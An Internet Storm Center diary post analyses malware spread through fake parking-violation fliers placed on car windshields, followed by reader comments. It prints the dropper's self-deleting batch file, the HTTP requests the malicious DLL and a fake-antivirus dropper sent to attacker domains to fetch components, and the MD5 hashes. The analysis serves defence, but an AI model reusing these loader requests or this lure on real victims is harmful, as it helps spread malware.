Malware infection that began with windshield fliers

Published: 2009-02-03
Last Updated: 2009-02-04 02:05:38 UTC
by Lenny Zeltser (Version: 1)
3 comment(s)

I had the opportunity to examine malware whose initial infection vector was a car windshield flier with a website address. The malicious programs were run-of-the-mill; however, the use of fliers was an innovative way of social-engineering potential victims into visiting a malicious website.

Several days ago, yellow fliers were placed on the cards in Grand Forks, ND. They stated:

PARKING VIOLATION This vehicle is in violation of standard parking regulations. To view pictures with information about your parking preferences, go to website-redacted

If you went to the website, you'd see several photos of cars on parking lots in that specific town, including:

EXIF data in JPG files shows that they were edited using Paint Shop Pro Photo 12 to remove license plate details of the cars and that the photos were taken using a Sony DSC-P32 camera.

 Installing PictureSearchToolbar.exe led to DNS queries for childhe.com, a domain with a bad reputation according to Symantec, McAfee, etc.  Even without the Internet connection, the program installed (extracted) a DLL into C:\WINDOWS\system32. The name was random, such as tuvwwUlj.dll and iifdbCVn.dll. The MD5 of the DLL was 5f7e6f158592f0a5036d79cc63388d29.

PictureSearchToolbar.exe was deleted via the following batch file, whichw as created in the %Temp% folder and left behind. The file name (e.g., awttsqQG.bat) and labels were likely random:

@echo off
:jkkHXRkJ
del %1
if exist %1 goto jkkHXRkJ 
rem wvUoPhICgeBqNhgHhgGxVPFUtuvVNFYrxxyxVoOHfccyyyWo

The malicious DLL was installed as an Internet Explorer Browser Helper Object (BHO) once the system is rebooted.

If the DLL could resolve childhe.com, then it issueed the following HTTP request to it on port 80:

GET /pas/apstpldr.dll.html?affid=177194&uid=&guid=4E83C7975FCD44B091226646F461D891
HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: childhe.com
Connection: Keep-Alive

"affid" didn't seem to change; it was probably the tracker ID for who should be getting paid or for how the campaign was working. "guid" seems to change across experiments. User-Agent was probably the actual User-Agent that was used on the infected system.

The request retrieved a malicious DLL, apstpldr.dll (MD5 4a56334f3f65d45d90aa15c1bd2f3484). It is a known malicious DLL; for an overview of one of its variants (a different MD5 sum), see the ThreatExpert report.

The apstpldr.dll file was packed with generic UPX. Unpacked MD5 abf04d02a97aa95e41a269c84261947e. Once the system was rebooted, the BHO was installed. The BHO seemed to wait for the user to browse the Internet a bit, and then brings up a pop-up with a fake security alert:

The victim was then redirected to http://bestantispy waresecurityscan.com/promo/1/freescan.php?nu=770522177194 and presented with additional fake infection warnings.

The victim was then asked to install a fake anti-virus scanner (MD5 2cb4ebb20e3178b6d8cbba95032da353). A few anti-virus companies detect this as a dropper; see the VirusTotal report.

The dropper attempted to perform a DNS query for protections oftwarecheck.com. If it could resolve the hostname, the executable connected to http://protectionsoft warecheck.com/windowsupdate/v6/thanks.aspx via:
GET /windowsupdate/v6/thanks.aspx HTTP/1.1
User-Agent: Mozilla
Host: update.microsoft.com
Cache-Control: no-cache

That's when I ran out of time, and decided not to continue following the infection trail.

So there  you have it, folks. The initial program installed itself as a browser helper object (BHO) for Internet Exploter that downloaded a component from childhe.com and attempted to trick the victim into installing a fake anti-virus scanner from bestantispyware securityscan.com and protectionsoft warecheck.com.

Attackers continue to come up with creative ways of tricking potential victims into installing malicious software. Merging physical and virtual worlds via objects that point to websites is one way to do this. I imagine we'll be seeing such approaches more often. If you have seen other examples like this, let us know.

Liked this? Post it to Twitter!

-- Lenny

Lenny Zeltser - Security Consulting

Lenny teaches malware analysis at SANS Institute. You're welcome to follow him on Twitter. You can also track new Internet Storm Center diaries by following ISC on Twitter.

 

Keywords:
3 comment(s)

Comments

The interesting aspect of this attack is that there is the physical dimension introduced by the flyers. Most sites you never know who or where the perpetrator really is since the Internet is so ethereal. In this case, you have a physical location, approximate time, and know a person is involved in distributing the flyers and the camera they were using.
I agree. What is worrisome is the combination of physical and virutal parts of the attack. I wonder if that is a trend rooted in the current economic condition...(http://kumarsrivastava.spaces.live.com)
This story has been picked by the Beeb.

http://news.bbc.co.uk/2/hi/technology/7872299.stm


Diary Archives